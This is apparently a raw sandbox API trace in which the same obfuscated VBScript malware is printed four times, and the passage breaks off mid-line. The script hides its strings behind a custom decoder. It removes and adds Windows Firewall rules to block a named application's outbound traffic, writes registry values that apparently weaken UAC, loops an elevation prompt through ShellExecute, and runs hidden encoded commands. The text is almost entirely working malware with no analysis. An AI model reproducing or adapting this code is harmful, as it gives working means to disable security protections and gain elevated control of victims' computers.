bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.288] wcsncmp (_String1="ve\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105 [0226.288] wcsncmp (_String1="e\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.288] wcsncmp (_String1="\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.288] wcsncmp (_String1="\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run 